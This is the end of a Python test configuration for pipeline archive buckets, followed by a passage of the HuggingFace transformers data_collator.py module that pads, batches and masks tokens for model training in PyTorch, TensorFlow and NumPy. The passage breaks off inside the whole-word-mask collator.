'archive_type': BucketPipelineArchive,
'constructor_arguments': [PrefixedBucket, TEST_UUID, AWSBucket, _result_bucket()],
}
config_manager['archive_listing_implementation'] = {
'archive_listing_type': BucketPipelineListing,
'constructor_arguments': [PrefixedBucket, TEST_UUID, AWSBucket, _result_bucket()],
}
config_manager['stage_log_archive_implementation'] = archive_implementation
config_manager['persisted_data_archive_implementation'] = archive_implementation
config_manager['provenance_archive_implementation'] = archive_implementation
config_manager['job_source_archive_implementation'] = archive_implementation
config_manager['artifact_archive_implementation'] = archive_implementation
config_manager['miscellaneous_archive_implementation'] = archive_implementation
config_manager['run_script_environment'] = {'enable_stages': True}
# quiet logs
config_manager['log_level'] = 'ERROR'
_config()
|
src/transformers/data/data_collator.py
|
manuelciosici/transformers
| 8,028 |
69629
|
<reponame>manuelciosici/transformers
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import random
import warnings
from collections.abc import Mapping
from dataclasses import dataclass
from typing import Any, Callable, Dict, List, NewType, Optional, Tuple, Union
from ..models.bert import BertTokenizer, BertTokenizerFast
from ..tokenization_utils_base import PreTrainedTokenizerBase
from ..utils import PaddingStrategy
InputDataClass = NewType("InputDataClass", Any)
"""
A DataCollator is a function that takes a list of samples from a Dataset and collate them into a batch, as a dictionary
of PyTorch/TensorFlow tensors or NumPy arrays.
"""
DataCollator = NewType("DataCollator", Callable[[List[InputDataClass]], Dict[str, Any]])
class DataCollatorMixin:
def __call__(self, features, return_tensors=None):
if return_tensors is None:
return_tensors = self.return_tensors
if return_tensors == "tf":
return self.tf_call(features)
elif return_tensors == "pt":
return self.torch_call(features)
elif return_tensors == "np":
return self.numpy_call(features)
else:
raise ValueError(f"Framework '{return_tensors}' not recognized!")
def default_data_collator(features: List[InputDataClass], return_tensors="pt") -> Dict[str, Any]:
"""
Very simple data collator that simply collates batches of dict-like objects and performs special handling for
potential keys named:
- `label`: handles a single value (int or float) per object
- `label_ids`: handles a list of values per object
Does not do any additional preprocessing: property names of the input object will be used as corresponding inputs
to the model. See glue and ner for example of how it's useful.
"""
# In this function we'll make the assumption that all `features` in the batch
# have the same attributes.
# So we will look at the first element as a proxy for what attributes exist
# on the whole batch.
if return_tensors == "pt":
return torch_default_data_collator(features)
elif return_tensors == "tf":
return tf_default_data_collator(features)
elif return_tensors == "np":
return numpy_default_data_collator(features)
@dataclass
class DefaultDataCollator(DataCollatorMixin):
"""
Very simple data collator that simply collates batches of dict-like objects and performs special handling for
potential keys named:
- `label`: handles a single value (int or float) per object
- `label_ids`: handles a list of values per object
Does not do any additional preprocessing: property names of the input object will be used as corresponding inputs
to the model. See glue and ner for example of how it's useful.
This is an object (like other data collators) rather than a pure function like default_data_collator. This can be
helpful if you need to set a return_tensors value at initialization.
Args:
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
"""
return_tensors: str = "pt"
def __call__(self, features: List[Dict[str, Any]], return_tensors=None) -> Dict[str, Any]:
if return_tensors is None:
return_tensors = self.return_tensors
return default_data_collator(features, return_tensors)
def torch_default_data_collator(features: List[InputDataClass]) -> Dict[str, Any]:
import torch
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label = first["label"].item() if isinstance(first["label"], torch.Tensor) else first["label"]
dtype = torch.long if isinstance(label, int) else torch.float
batch["labels"] = torch.tensor([f["label"] for f in features], dtype=dtype)
elif "label_ids" in first and first["label_ids"] is not None:
if isinstance(first["label_ids"], torch.Tensor):
batch["labels"] = torch.stack([f["label_ids"] for f in features])
else:
dtype = torch.long if type(first["label_ids"][0]) is int else torch.float
batch["labels"] = torch.tensor([f["label_ids"] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([f[k] for f in features])
else:
batch[k] = torch.tensor([f[k] for f in features])
return batch
def tf_default_data_collator(features: List[InputDataClass]) -> Dict[str, Any]:
import numpy as np
import tensorflow as tf
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label_col_name = "label"
elif "label_ids" in first and first["label_ids"] is not None:
label_col_name = "label_ids"
elif "labels" in first and first["labels"] is not None:
label_col_name = "labels"
else:
label_col_name = None
if label_col_name is not None:
if isinstance(first[label_col_name], tf.Tensor):
dtype = tf.int64 if first[label_col_name].dtype.is_integer() else tf.float32
elif isinstance(first[label_col_name], np.ndarray) or isinstance(first[label_col_name], np.generic):
dtype = tf.int64 if np.issubdtype(first[label_col_name].dtype, np.integer) else tf.float32
elif isinstance(first[label_col_name], (tuple, list)):
dtype = tf.int64 if isinstance(first[label_col_name][0], int) else tf.float32
else:
dtype = tf.int64 if isinstance(first[label_col_name], int) else tf.float32
batch["labels"] = tf.convert_to_tensor([f[label_col_name] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
for k, v in first.items():
if k not in ("label", "label_ids", "labels") and v is not None and not isinstance(v, str):
if isinstance(v, (tf.Tensor, np.ndarray)):
batch[k] = tf.stack([f[k] for f in features])
else:
batch[k] = tf.convert_to_tensor([f[k] for f in features])
return batch
def numpy_default_data_collator(features: List[InputDataClass]) -> Dict[str, Any]:
import numpy as np
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label = first["label"].item() if isinstance(first["label"], np.ndarray) else first["label"]
dtype = np.int64 if isinstance(label, int) else np.float32
batch["labels"] = np.array([f["label"] for f in features], dtype=dtype)
elif "label_ids" in first and first["label_ids"] is not None:
if isinstance(first["label_ids"], np.ndarray):
batch["labels"] = np.stack([f["label_ids"] for f in features])
else:
dtype = np.int64 if type(first["label_ids"][0]) is int else np.float32
batch["labels"] = np.array([f["label_ids"] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, np.ndarray):
batch[k] = np.stack([f[k] for f in features])
else:
batch[k] = np.array([f[k] for f in features])
return batch
@dataclass
class DataCollatorWithPadding:
"""
Data collator that will dynamically pad the inputs received.
Args:
tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]):
The tokenizer used for encoding the data.
padding (`bool`, `str` or [`~utils.PaddingStrategy`], *optional*, defaults to `True`):
Select a strategy to pad the returned sequences (according to the model's padding side and padding index)
among:
- `True` or `'longest'` (default): Pad to the longest sequence in the batch (or no padding if only a single
sequence is provided).
- `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum
acceptable input length for the model if that argument is not provided.
- `False` or `'do_not_pad'`: No padding (i.e., can output a batch with sequences of different lengths).
max_length (`int`, *optional*):
Maximum length of the returned list and optionally padding length (see above).
pad_to_multiple_of (`int`, *optional*):
If set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >=
7.5 (Volta).
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
"""
tokenizer: PreTrainedTokenizerBase
padding: Union[bool, str, PaddingStrategy] = True
max_length: Optional[int] = None
pad_to_multiple_of: Optional[int] = None
return_tensors: str = "pt"
def __call__(self, features: List[Dict[str, Any]]) -> Dict[str, Any]:
batch = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
return_tensors=self.return_tensors,
)
if "label" in batch:
batch["labels"] = batch["label"]
del batch["label"]
if "label_ids" in batch:
batch["labels"] = batch["label_ids"]
del batch["label_ids"]
return batch
@dataclass
class DataCollatorForTokenClassification(DataCollatorMixin):
"""
Data collator that will dynamically pad the inputs received, as well as the labels.
Args:
tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]):
The tokenizer used for encoding the data.
padding (`bool`, `str` or [`~utils.PaddingStrategy`], *optional*, defaults to `True`):
Select a strategy to pad the returned sequences (according to the model's padding side and padding index)
among:
- `True` or `'longest'`: Pad to the longest sequence in the batch (or no padding if only a single sequence
is provided).
- `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum
acceptable input length for the model if that argument is not provided.
- `False` or `'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of different
lengths).
max_length (`int`, *optional*):
Maximum length of the returned list and optionally padding length (see above).
pad_to_multiple_of (`int`, *optional*):
If set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >=
7.5 (Volta).
label_pad_token_id (`int`, *optional*, defaults to -100):
The id to use when padding the labels (-100 will be automatically ignore by PyTorch loss functions).
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
"""
tokenizer: PreTrainedTokenizerBase
padding: Union[bool, str, PaddingStrategy] = True
max_length: Optional[int] = None
pad_to_multiple_of: Optional[int] = None
label_pad_token_id: int = -100
return_tensors: str = "pt"
def torch_call(self, features):
import torch
label_name = "label" if "label" in features[0].keys() else "labels"
labels = [feature[label_name] for feature in features] if label_name in features[0].keys() else None
batch = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
# Conversion to tensors will fail if we have labels as they are not of the same length yet.
return_tensors="pt" if labels is None else None,
)
if labels is None:
return batch
sequence_length = torch.tensor(batch["input_ids"]).shape[1]
padding_side = self.tokenizer.padding_side
if padding_side == "right":
batch[label_name] = [
list(label) + [self.label_pad_token_id] * (sequence_length - len(label)) for label in labels
]
else:
batch[label_name] = [
[self.label_pad_token_id] * (sequence_length - len(label)) + list(label) for label in labels
]
batch = {k: torch.tensor(v, dtype=torch.int64) for k, v in batch.items()}
return batch
def tf_call(self, features):
import tensorflow as tf
label_name = "label" if "label" in features[0].keys() else "labels"
labels = [feature[label_name] for feature in features] if label_name in features[0].keys() else None
batch = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
# Conversion to tensors will fail if we have labels as they are not of the same length yet.
return_tensors="tf" if labels is None else None,
)
if labels is None:
return batch
sequence_length = tf.convert_to_tensor(batch["input_ids"]).shape[1]
padding_side = self.tokenizer.padding_side
if padding_side == "right":
batch["labels"] = [
list(label) + [self.label_pad_token_id] * (sequence_length - len(label)) for label in labels
]
else:
batch["labels"] = [
[self.label_pad_token_id] * (sequence_length - len(label)) + list(label) for label in labels
]
batch = {k: tf.convert_to_tensor(v, dtype=tf.int64) for k, v in batch.items()}
return batch
def numpy_call(self, features):
import numpy as np
label_name = "label" if "label" in features[0].keys() else "labels"
labels = [feature[label_name] for feature in features] if label_name in features[0].keys() else None
batch = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
# Conversion to tensors will fail if we have labels as they are not of the same length yet.
return_tensors="np" if labels is None else None,
)
if labels is None:
return batch
sequence_length = np.array(batch["input_ids"]).shape[1]
padding_side = self.tokenizer.padding_side
if padding_side == "right":
batch["labels"] = [
list(label) + [self.label_pad_token_id] * (sequence_length - len(label)) for label in labels
]
else:
batch["labels"] = [
[self.label_pad_token_id] * (sequence_length - len(label)) + list(label) for label in labels
]
batch = {k: np.array(v, dtype=np.int64) for k, v in batch.items()}
return batch
def _torch_collate_batch(examples, tokenizer, pad_to_multiple_of: Optional[int] = None):
"""Collate `examples` into a batch, using the information in `tokenizer` for padding if necessary."""
import numpy as np
import torch
# Tensorize if necessary.
if isinstance(examples[0], (list, tuple, np.ndarray)):
examples = [torch.tensor(e, dtype=torch.long) for e in examples]
length_of_first = examples[0].size(0)
# Check if padding is necessary.
are_tensors_same_length = all(x.size(0) == length_of_first for x in examples)
if are_tensors_same_length and (pad_to_multiple_of is None or length_of_first % pad_to_multiple_of == 0):
return torch.stack(examples, dim=0)
# If yes, check if we have a `pad_token`.
if tokenizer._pad_token is None:
raise ValueError(
"You are attempting to pad samples but the tokenizer you are using"
f" ({tokenizer.__class__.__name__}) does not have a pad token."
)
# Creating the full tensor and filling it with our data.
max_length = max(x.size(0) for x in examples)
if pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
result = examples[0].new_full([len(examples), max_length], tokenizer.pad_token_id)
for i, example in enumerate(examples):
if tokenizer.padding_side == "right":
result[i, : example.shape[0]] = example
else:
result[i, -example.shape[0] :] = example
return result
def _tf_collate_batch(examples, tokenizer, pad_to_multiple_of: Optional[int] = None):
import numpy as np
import tensorflow as tf
"""Collate `examples` into a batch, using the information in `tokenizer` for padding if necessary."""
# Tensorize if necessary.
if isinstance(examples[0], (list, tuple)):
examples = [tf.convert_to_tensor(e, dtype=tf.int64) for e in examples]
# Check if padding is necessary.
length_of_first = len(examples[0])
are_tensors_same_length = all(len(x) == length_of_first for x in examples)
if are_tensors_same_length and (pad_to_multiple_of is None or length_of_first % pad_to_multiple_of == 0):
return tf.stack(examples, axis=0)
# If yes, check if we have a `pad_token`.
if tokenizer._pad_token is None:
raise ValueError(
"You are attempting to pad samples but the tokenizer you are using"
f" ({tokenizer.__class__.__name__}) does not have a pad token."
)
# Creating the full tensor and filling it with our data.
max_length = max(len(x) for x in examples)
if pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
# result = examples[0].new_full([len(examples), max_length], tokenizer.pad_token_id)
result = []
rank = tf.rank(examples[0])
paddings = np.zeros((rank, 2), dtype=np.int32)
for example in examples:
if tokenizer.padding_side == "right":
paddings[0, 1] = max_length - len(example)
else:
paddings[0, 0] = max_length - len(example)
result.append(tf.pad(example, paddings, constant_values=tokenizer.pad_token_id))
return tf.stack(result, axis=0)
def _numpy_collate_batch(examples, tokenizer, pad_to_multiple_of: Optional[int] = None):
import numpy as np
"""Collate `examples` into a batch, using the information in `tokenizer` for padding if necessary."""
# Tensorize if necessary.
if isinstance(examples[0], (list, tuple)):
examples = [np.array(e, dtype=np.int64) for e in examples]
# Check if padding is necessary.
length_of_first = len(examples[0])
are_tensors_same_length = all(len(x) == length_of_first for x in examples)
if are_tensors_same_length and (pad_to_multiple_of is None or length_of_first % pad_to_multiple_of == 0):
return np.stack(examples, axis=0)
# If yes, check if we have a `pad_token`.
if tokenizer._pad_token is None:
raise ValueError(
"You are attempting to pad samples but the tokenizer you are using"
f" ({tokenizer.__class__.__name__}) does not have a pad token."
)
# Creating the full tensor and filling it with our data.
max_length = max(len(x) for x in examples)
if pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
result = np.full(shape=(len(examples), max_length), fill_value=tokenizer.pad_token_id, dtype=examples[0].dtype)
for i, example in enumerate(examples):
if tokenizer.padding_side == "right":
result[i, : example.shape[0]] = example
else:
result[i, -example.shape[0] :] = example
return result
def tolist(x):
if isinstance(x, list):
return x
elif hasattr(x, "numpy"): # Checks for TF tensors without needing the import
x = x.numpy()
return x.tolist()
@dataclass
class DataCollatorForSeq2Seq:
"""
Data collator that will dynamically pad the inputs received, as well as the labels.
Args:
tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]):
The tokenizer used for encoding the data.
model ([`PreTrainedModel`]):
The model that is being trained. If set and has the *prepare_decoder_input_ids_from_labels*, use it to
prepare the *decoder_input_ids*
This is useful when using *label_smoothing* to avoid calculating loss twice.
padding (`bool`, `str` or [`~utils.PaddingStrategy`], *optional*, defaults to `True`):
Select a strategy to pad the returned sequences (according to the model's padding side and padding index)
among:
- `True` or `'longest'`: Pad to the longest sequence in the batch (or no padding if only a single sequence
is provided).
- `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum
acceptable input length for the model if that argument is not provided.
- `False` or `'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of different
lengths).
max_length (`int`, *optional*):
Maximum length of the returned list and optionally padding length (see above).
pad_to_multiple_of (`int`, *optional*):
If set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >=
7.5 (Volta).
label_pad_token_id (`int`, *optional*, defaults to -100):
The id to use when padding the labels (-100 will be automatically ignored by PyTorch loss functions).
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
"""
tokenizer: PreTrainedTokenizerBase
model: Optional[Any] = None
padding: Union[bool, str, PaddingStrategy] = True
max_length: Optional[int] = None
pad_to_multiple_of: Optional[int] = None
label_pad_token_id: int = -100
return_tensors: str = "pt"
def __call__(self, features, return_tensors=None):
import numpy as np
if return_tensors is None:
return_tensors = self.return_tensors
labels = [feature["labels"] for feature in features] if "labels" in features[0].keys() else None
# We have to pad the labels before calling `tokenizer.pad` as this method won't pad them and needs them of the
# same length to return tensors.
if labels is not None:
max_label_length = max(len(l) for l in labels)
if self.pad_to_multiple_of is not None:
max_label_length = (
(max_label_length + self.pad_to_multiple_of - 1)
// self.pad_to_multiple_of
* self.pad_to_multiple_of
)
padding_side = self.tokenizer.padding_side
for feature in features:
remainder = [self.label_pad_token_id] * (max_label_length - len(feature["labels"]))
if isinstance(feature["labels"], list):
feature["labels"] = (
feature["labels"] + remainder if padding_side == "right" else remainder + feature["labels"]
)
elif padding_side == "right":
feature["labels"] = np.concatenate([feature["labels"], remainder]).astype(np.int64)
else:
feature["labels"] = np.concatenate([remainder, feature["labels"]]).astype(np.int64)
features = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
return_tensors=return_tensors,
)
# prepare decoder_input_ids
if (
labels is not None
and self.model is not None
and hasattr(self.model, "prepare_decoder_input_ids_from_labels")
):
decoder_input_ids = self.model.prepare_decoder_input_ids_from_labels(labels=features["labels"])
features["decoder_input_ids"] = decoder_input_ids
return features
@dataclass
class DataCollatorForLanguageModeling(DataCollatorMixin):
"""
Data collator used for language modeling. Inputs are dynamically padded to the maximum length of a batch if they
are not all of the same length.
Args:
tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]):
The tokenizer used for encoding the data.
mlm (`bool`, *optional*, defaults to `True`):
Whether or not to use masked language modeling. If set to `False`, the labels are the same as the inputs
with the padding tokens ignored (by setting them to -100). Otherwise, the labels are -100 for non-masked
tokens and the value to predict for the masked token.
mlm_probability (`float`, *optional*, defaults to 0.15):
The probability with which to (randomly) mask tokens in the input, when `mlm` is set to `True`.
pad_to_multiple_of (`int`, *optional*):
If set will pad the sequence to a multiple of the provided value.
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
<Tip>
For best performance, this data collator should be used with a dataset having items that are dictionaries or
BatchEncoding, with the `"special_tokens_mask"` key, as returned by a [`PreTrainedTokenizer`] or a
[`PreTrainedTokenizerFast`] with the argument `return_special_tokens_mask=True`.
</Tip>"""
tokenizer: PreTrainedTokenizerBase
mlm: bool = True
mlm_probability: float = 0.15
pad_to_multiple_of: Optional[int] = None
tf_experimental_compile: bool = False
return_tensors: str = "pt"
def __post_init__(self):
if self.mlm and self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. "
"You should pass `mlm=False` to train on causal language modeling instead."
)
if self.tf_experimental_compile:
import tensorflow as tf
self.tf_mask_tokens = tf.function(self.tf_mask_tokens, jit_compile=True)
@staticmethod
def tf_bernoulli(shape, probability):
import tensorflow as tf
prob_matrix = tf.fill(shape, probability)
return tf.cast(prob_matrix - tf.random.uniform(shape, 0, 1) >= 0, tf.bool)
def tf_mask_tokens(
self, inputs: Any, vocab_size, mask_token_id, special_tokens_mask: Optional[Any] = None
) -> Tuple[Any, Any]:
"""
Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original.
"""
import tensorflow as tf
input_shape = tf.shape(inputs)
# 1 for a special token, 0 for a normal token in the special tokens mask
# We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`)
masked_indices = self.tf_bernoulli(input_shape, self.mlm_probability) & ~special_tokens_mask
# Replace unmasked indices with -100 in the labels since we only compute loss on masked tokens
labels = tf.where(masked_indices, inputs, -100)
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = self.tf_bernoulli(input_shape, 0.8) & masked_indices
inputs = tf.where(indices_replaced, mask_token_id, inputs)
# 10% of the time, we replace masked input tokens with random word
indices_random = self.tf_bernoulli(input_shape, 0.1) & masked_indices & ~indices_replaced
random_words = tf.random.uniform(input_shape, maxval=vocab_size, dtype=tf.int64)
inputs = tf.where(indices_random, random_words, inputs)
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
def tf_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
import tensorflow as tf
# Handle dict or lists with proper padding and conversion to tensor.
if isinstance(examples[0], Mapping):
batch = self.tokenizer.pad(examples, return_tensors="tf", pad_to_multiple_of=self.pad_to_multiple_of)
else:
batch = {
"input_ids": _tf_collate_batch(examples, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
}
# If special token mask has been preprocessed, pop it from the dict.
special_tokens_mask = batch.pop("special_tokens_mask", None)
if self.mlm:
if special_tokens_mask is None:
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True)
for val in batch["input_ids"].numpy().tolist()
]
# Cannot directly create as bool
special_tokens_mask = tf.cast(tf.convert_to_tensor(special_tokens_mask, dtype=tf.int64), tf.bool)
else:
special_tokens_mask = tf.cast(special_tokens_mask, tf.bool)
batch["input_ids"], batch["labels"] = self.tf_mask_tokens(
tf.cast(batch["input_ids"], tf.int64),
special_tokens_mask=special_tokens_mask,
mask_token_id=self.tokenizer.mask_token_id,
vocab_size=len(self.tokenizer),
)
else:
labels = batch["input_ids"]
if self.tokenizer.pad_token_id is not None:
# Replace self.tokenizer.pad_token_id with -100
labels = tf.where(labels == self.tokenizer.pad_token_id, -100, labels)
else:
labels = tf.identity(labels) # Makes a copy, just in case
batch["labels"] = labels
return batch
def torch_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
# Handle dict or lists with proper padding and conversion to tensor.
if isinstance(examples[0], Mapping):
batch = self.tokenizer.pad(examples, return_tensors="pt", pad_to_multiple_of=self.pad_to_multiple_of)
else:
batch = {
"input_ids": _torch_collate_batch(examples, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
}
# If special token mask has been preprocessed, pop it from the dict.
special_tokens_mask = batch.pop("special_tokens_mask", None)
if self.mlm:
batch["input_ids"], batch["labels"] = self.torch_mask_tokens(
batch["input_ids"], special_tokens_mask=special_tokens_mask
)
else:
labels = batch["input_ids"].clone()
if self.tokenizer.pad_token_id is not None:
labels[labels == self.tokenizer.pad_token_id] = -100
batch["labels"] = labels
return batch
def torch_mask_tokens(self, inputs: Any, special_tokens_mask: Optional[Any] = None) -> Tuple[Any, Any]:
"""
Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original.
"""
import torch
labels = inputs.clone()
# We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`)
probability_matrix = torch.full(labels.shape, self.mlm_probability)
if special_tokens_mask is None:
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
special_tokens_mask = torch.tensor(special_tokens_mask, dtype=torch.bool)
else:
special_tokens_mask = special_tokens_mask.bool()
probability_matrix.masked_fill_(special_tokens_mask, value=0.0)
masked_indices = torch.bernoulli(probability_matrix).bool()
labels[~masked_indices] = -100 # We only compute loss on masked tokens
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices
inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)
# 10% of the time, we replace masked input tokens with random word
indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
random_words = torch.randint(len(self.tokenizer), labels.shape, dtype=torch.long)
inputs[indices_random] = random_words[indices_random]
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
def numpy_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
import numpy as np
# Handle dict or lists with proper padding and conversion to tensor.
if isinstance(examples[0], Mapping):
batch = self.tokenizer.pad(examples, return_tensors="np", pad_to_multiple_of=self.pad_to_multiple_of)
else:
batch = {
"input_ids": _numpy_collate_batch(examples, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
}
# If special token mask has been preprocessed, pop it from the dict.
special_tokens_mask = batch.pop("special_tokens_mask", None)
if self.mlm:
batch["input_ids"], batch["labels"] = self.numpy_mask_tokens(
batch["input_ids"], special_tokens_mask=special_tokens_mask
)
else:
labels = np.copy(batch["input_ids"])
if self.tokenizer.pad_token_id is not None:
labels[labels == self.tokenizer.pad_token_id] = -100
batch["labels"] = labels
return batch
def numpy_mask_tokens(self, inputs: Any, special_tokens_mask: Optional[Any] = None) -> Tuple[Any, Any]:
"""
Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original.
"""
import numpy as np
labels = np.copy(inputs)
# We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`)
probability_matrix = np.full(labels.shape, self.mlm_probability)
if special_tokens_mask is None:
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
special_tokens_mask = np.array(special_tokens_mask, dtype=np.bool)
else:
special_tokens_mask = special_tokens_mask.astype(np.bool)
probability_matrix[special_tokens_mask] = 0
# Numpy doesn't have bernoulli, so we use a binomial with 1 trial
masked_indices = np.random.binomial(1, probability_matrix, size=probability_matrix.shape).astype(np.bool)
labels[~masked_indices] = -100 # We only compute loss on masked tokens
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = np.random.binomial(1, 0.8, size=labels.shape).astype(np.bool) & masked_indices
inputs[indices_replaced] = self.tokenizer.mask_token_id
# 10% of the time, we replace masked input tokens with random word
# indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
indices_random = (
np.random.binomial(1, 0.5, size=labels.shape).astype(np.bool) & masked_indices & ~indices_replaced
)
random_words = np.random.randint(
low=0, high=len(self.tokenizer), size=np.count_nonzero(indices_random), dtype=np.int64
)
inputs[indices_random] = random_words
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
@dataclass
class DataCollatorForWholeWordMask(DataCollatorForLanguageModeling):
"""
Data collator used for language modeling that masks entire words.
- collates batches of tensors, honoring their tokenizer's pad_token
- preprocesses batches for masked language modeling
<Tip>
This collator relies on details of the implementation of subword tokenization by [`BertTokenizer`], specifically
that subword tokens are prefixed with *##*. For tokenizers that do not adhere to this scheme, this collator will
produce an output that is roughly equivalent to [`.DataCollatorForLanguageModeling`].
</Tip>"""
def torch_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
input_ids = [e["input_ids"] for e in examples]
else:
input_ids = examples
examples = [{"input_ids": e} for e in examples]
batch_input = _torch_collate_batch(input_ids, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
mask_labels = []
for e in examples:
ref_tokens = []
for id in tolist(e["input_ids"]):
token = self.tokenizer._convert_id_to_token(id)
ref_tokens.append(token)
# For Chinese tokens, we need extra inf to mark sub-word, e.g [喜,欢]-> [喜,##欢]
if "chinese_ref" in e:
ref_pos = tolist(e["chinese_ref"])
len_seq = len(e["input_ids"])
for i in range(len_seq):
if i in ref_pos:
ref_tokens[i] = "##" + ref_tokens[i]
mask_labels.append(self._whole_word_mask(ref_tokens))
batch_mask = _torch_collate_batch(mask_labels, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
inputs, labels = self.torch_mask_tokens(batch_input, batch_mask)
return {"input_ids": inputs, "labels": labels}
def tf_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
input_ids = [e["input_ids"] for e in examples]
else:
input_ids = examples
examples = [{"input_ids": e} for e in examples]
batch_input = _tf_collate_batch(input_ids, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
mask_labels = []
for e in examples:
ref_tokens = []
for id in tolist(e["input_ids"]):
token = self.tokenizer._convert_id_to_token(id)
ref_tokens.append(token)
# For Chinese tokens, we need extra inf to mark sub-word, e.g [喜,欢]-> [喜,##欢]
if "chinese_ref" in e:
ref_pos = tolist(e["chinese_ref"])
len_seq = len(e["input_ids"])
for i in range(len_seq):
if i in ref_pos:
ref_tokens[i] = "##" + ref_tokens[i]
mask_labels.append(self._whole_word_mask(ref_tokens))
